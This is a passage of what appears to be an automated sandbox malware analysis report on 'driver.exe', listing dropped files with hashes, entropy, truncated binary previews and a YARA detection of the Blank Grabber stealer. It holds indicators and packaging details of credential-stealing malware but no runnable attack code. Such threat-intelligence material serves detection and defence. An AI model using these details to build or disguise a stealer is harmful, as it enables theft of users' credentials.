Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........iV...8...8...8..p....8.t9...8.p9...8...9...8.t=...8.t<...8.t;...8.1t<...8.1t;...8.1t8...8.1t:...8.Rich..8.........................PE..d...Sh.c.........." ...".@................................................................`.....................................................................P.......................................................@...........................................UPX0....................................UPX1.....@.......<..................@...UPX2.................@..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI57082\libssl-3.dll

Download File

Process:	C:\Users\user\Desktop\driver.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	227096
Entropy (8bit):	7.928768674438361
Encrypted:	false
SSDEEP:	6144:PpEswYxCQyTp2Z/3YUtoQe5efEw+OXDbM3nFLQdFM4mNJQ:PpAqo92h3Y660Ew+OTbAFLQd2lw
MD5:	B2E766F5CF6F9D4DCBE8537BC5BDED2F
SHA1:	331269521CE1AB76799E69E9AE1C3B565A838574
SHA-256:	3CC6828E7047C6A7EFF517AA434403EA42128C8595BF44126765B38200B87CE4
SHA-512:	5233C8230497AADB9393C3EE5049E4AB99766A68F82091FE32393EE980887EBD4503BF88847C462C40C3FC786F8D179DAC5CB343B980944ADE43BC6646F5AD5A
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l.>..\|m..\|m..\|m.u.m..\|m+.}l..\|m.u}l..\|m+..l..\|m+.xl..\|m+.yl..\|m..}l..\|m..}m..\|m..xl..\|m..\|l..\|m...m..\|m..~l..\|mRich..\|m................PE..d......f.........." ...(.....P...... z....................................................`............................................,C......8............ ...M.................................................. ...@...........................................UPX0....................................UPX1................................@....rsrc....P.......L..................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI57082\python313.dll

Download File

Process:	C:\Users\user\Desktop\driver.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1850360
Entropy (8bit):	7.9939340697016155
Encrypted:	true
SSDEEP:	49152:VfOZocB9lcRar86XqS2fUbe1F6lRiPp3UdwT6m5FmZ9UTCO:VYB9GRag6kfQe1kyx3UdzscZk
MD5:	9A3D3AE5745A79D276B05A85AEA02549
SHA1:	A5E60CAC2CA606DF4F7646D052A9C0EA813E7636
SHA-256:	09693BAB682495B01DE8A24C435CA5900E11D2D0F4F0807DAE278B3A94770889
SHA-512:	46840B820EE3C0FA511596124EB364DA993EC7AE1670843A15AFD40AC63F2C61846434BE84D191BD53F7F5F4E17FAD549795822BB2B9C792AC22A1C26E5ADF69
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........F.r.'.!.'.!.'.!.. .'.!.z!.'.!.. .'.!.. .'.!.. .'.!._.!.'.!... .'.!.'.!N&.!F.. -'.!F.. .'.!F.x!.'.!F.. .'.!Rich.'.!........PE..d....WOg.........." ...*.0.......0J..]e..@J..................................Pf...........`.........................................H.e......ye......pe......P]..............Gf.,............................je.(...Pje.@...........................................UPX0.....0J.............................UPX1.....0...@J..,..................@....rsrc........pe......0..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe

Download File

Process:	C:\Users\user\Desktop\driver.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	630736
Entropy (8bit):	6.409476333013752
Encrypted:	false
SSDEEP:	12288:3lPCcFDlj+gV4zOifKlOWVNcjfQww0S5JPgdbBC9qxbYG9Y:3lPCcvj+YYrfSOWVNcj1JS5JPgdbBCZd
MD5:	9C223575AE5B9544BC3D69AC6364F75E
SHA1:	8A1CB5EE02C742E937FEBC57609AC312247BA386
SHA-256:	90341AC8DCC9EC5F9EFE89945A381EB701FE15C3196F594D9D9F0F67B4FC2213
SHA-512:	57663E2C07B56024AAAE07515EE3A56B2F5068EBB2F2DC42BE95D1224376C2458DA21C965AAB6AE54DE780CB874C2FC9DE83D9089ABF4536DE0F50FACA582D09
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........@.a.@.a.@.a..v..F.a..v....a..v..M.a..J..B.a.{.b.H.a.{.d.j.a.{.e.U.a.I..K.a.@.`...a..d...a....A.a..c.A.a.Rich@.a.................PE..d....~.^.........."..........2.................@.............................p.......4....`..................................................]..x.......Xy......pD...`...?...`..........T...................x...(.......................@............................text...C........................... ..`.rdata..:p.......r..................@..@.data............2...b..............@....pdata..pD.......F..................@..@.tls................................@....rsrc...Xy.......z..................@..@.reloc.......`.......V..............@..B................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI57082\rarreg.key

Download File

Process:	C:\Users\user\Desktop\driver.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	456
Entropy (8bit):	4.447296373872587
Encrypted:	false
SSDEEP:	12:Bn9j9sxpCDPxfhKLiaE5cNH0u/OCIhjWO:B9jiWDpf025cNU7CIEO
MD5:	4531984CAD7DACF24C086830068C4ABE
SHA1:	FA7C8C46677AF01A83CF652EF30BA39B2AAE14C3
SHA-256:	58209C8AB4191E834FFE2ECD003FD7A830D3650F0FD1355A74EB8A47C61D4211
SHA-512:	00056F471945D838EF2CE56D51C32967879FE54FCBF93A237ED85A98E27C5C8D2A39BC815B41C15CAACE2071EDD0239D775A31D1794DC4DBA49E7ECFF1555122
Malicious:	true
Yara Hits:	Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rarreg.key, Author: Joe Security
Reputation:	unknown
Preview:	RAR registration data.Blank-c.Stealer License.UID=e7ae0ee11c8703113d95.64122122503d95ca34668bc2ffb72bcf8579be24bc20f3cd84baaf.afcf62e30badf158ad0c60feb872189f288e79eb40c28ca0ab6407.3a46f47624f80a44a0e4d71ef4224075bf9e28fce340a29099d287.15690be6b591c3bb355e99d6d1b8ffcd69602cb8aaa6dedf268c83.55c1fb90c384a926139625f6c0cbfc57a96996fdb04075bf9e28fc.e340a29067e9237e333577d2c7f3ed1d0f63287f74c9e50c60d76d.b5915ff59f78103d48e0826658d72ba8813da4a649711057613203.

C:\Users\user\AppData\Local\Temp\_MEI57082\select.pyd

Download File

Process:	C:\Users\user\Desktop\driver.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	27640
Entropy (8bit):	7.429887403983581
Encrypted:	false
SSDEEP:	768:DaWVMhw2pYjGIm9GtaJyUFRYT2Ip4HCxf1mlzzTz:OKE4jGIm9GtmyUzR9YfIPv
MD5:	933DA5361079FC8457E19ADAB86FF4E0
SHA1:	51BCCF47008130BAADD49A3F55F85FE968177233
SHA-256:	ADFDF84FF4639F8A921B78A2EFCE1B89265DF2B512DF05CE2859FC3CC6E33EFF
SHA-512:	0078CD5DF1B78D51B0ACB717E051E83CB18A9DAF499A959DA84A331FA7A839EEFA303672D741B29FF2E0C34D1EF3F07505609F1102E9E86FAB1C9FD066C67570
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Ks{..(..(..(.R.(..(..)..(..)..(..)..(..)..(w..)..(..(..(...)..(w..)..(w..)..(w..(..(w..)..(Rich..(................PE..d....WOg.........." ....0..........@.....................................................`......................................... ...L....................`..............l.......................................P...@...........................................UPX0....................................UPX1.....0.......(..................@....rsrc................,..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI57082\sqlite3.dll

Download File

Process:	C:\Users\user\Desktop\driver.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	661360
Entropy (8bit):	7.993016249967087
Encrypted:	true
SSDEEP:	12288:fnhOhXqE88i5E+P5p6YOU7hN8QtcsWO4qlD0kHpM7rLXF81PrtKtD1Gj40QeqG+e:fnWaI6lP5+whKQusF44ZQ3sZKt1n0QC/
MD5:	FF62332FA199145AAF12314DBF9841A3
SHA1:	714A50B5351D5C8AFDDB16A4E51A8998F976DA65
SHA-256:	36E1C70AFC8AD8AFE4A4F3EF4F133390484BCA4EA76941CC55BAC7E9DF29EEFD
SHA-512:	EEFF68432570025550D4C205ABF585D2911E0FF59B6ECA062DD000087F96C7896BE91EDA7612666905445627FC3FC974AEA7C3428A708C7DE2CA14C7BCE5CCA5
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s...7.x.7.x.7.x.>..;.x.&(y.5.x.&({.3.x.&(\|.?.x.&(}.:.x.E/y.4.x.7.y...x..(p.6.x..(x.6.x..(..6.x..(z.6.x.Rich7.x.........................PE..d....WOg.........." ...*.....0............................................................`..............................................#..............................................................................@...........................................UPX0....................................UPX1................................@....rsrc....0.......0..................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI57082\ucrtbase.dll

Download File

Process:	C:\Users\user\Desktop\driver.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1016584
Entropy (8bit):	6.669319438805479
Encrypted:	false
SSDEEP:	24576:VkmZDEMHhp9v1Ikbn3ND0TNVOsIut8P4zmxvSZX0yplkA:mmZFHhp9v1Io3h0TN3pvkA
MD5:	0E0BAC3D1DCC1833EAE4E3E4CF83C4EF
SHA1:	4189F4459C54E69C6D3155A82524BDA7549A75A6
SHA-256:	8A91052EF261B5FBF3223AE9CE789AF73DFE1E9B0BA5BDBC4D564870A24F2BAE
SHA-512:	A45946E3971816F66DD7EA3788AACC384A9E95011500B458212DC104741315B85659E0D56A41570731D338BDF182141C093D3CED222C007038583CEB808E26FD
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........W..l9F.l9F.l9F...F.l9F.l8F.l9F...F.l9F..9G.l9F..:G.l9F..<G.l9F..7G.n9F..=G.l9F...F.l9F..;G.l9FRich.l9F........PE..d.....}X.........." .........`............................................................`A................................................p......................F...=......p...PX..T............................'...............O...............................text............................... ..`.rdata..<u.......v..................@..@.data....$...........r..............@....pdata.............................@..@.rsrc................4..............@..@.reloc..p............:..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI57082\unicodedata.pyd

Download File

Process:	C:\Users\user\Desktop\driver.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	269032
Entropy (8bit):	7.980717016340488
Encrypted:	false
SSDEEP:	6144:vFHvhlPKHwqcv9DqegNsKUuFLttFHg+hMrZ99hYN8khEc9v:vtJlyHwqSBqpNsKUuntFJhMF9HC84v
MD5:	867ECDE9FF7F92D375165AE5F3C439CB
SHA1:	37D1AC339EB194CE98548AB4E4963FE30EA792AE
SHA-256:	A2061EF4DF5999CA0498BEE2C7DD321359040B1ACF08413C944D468969C27579
SHA-512:	0DCE05D080E59F98587BCE95B26A3B5D7910D4CB5434339810E2AAE8CFE38292F04C3B706FCD84957552041D4D8C9F36A1844A856D1729790160CEF296DCCFC2
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b..Q&...&...&.../fY. ...7...$...7...%...7.......7...+.......%...T...$...&...i.......'.......'.....5.'.......'...Rich&...................PE..d....WOg.........." ...*.........0..0....@...................................0............`..........................................+..X....)....... .......................+..$...................................0...@...........................................UPX0.....0..............................UPX1.........@......................@....rsrc........ ......................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0p131yq2.o0f.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b4gqxxqz.bp4.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d3hxhra3.g4m.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_edvyrlwl.pxa.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eifbctft.s1p.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f0iln0ed.p2m.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g4exqotp.ifc.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gxs0cpse.ha4.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_heywqq1p.0d3.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_idecyggz.i3k.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_igbw3ji4.aol.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ikqi1mae.dsx.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ixql2sba.uab.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jwpsdoch.nfi.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ktkgyusg.hgu.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mpcthwaw.c1k.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nkbijalw.jz1.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o32tapnv.1bc.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_syphp4ce.aic.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tcvksuga.kk4.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

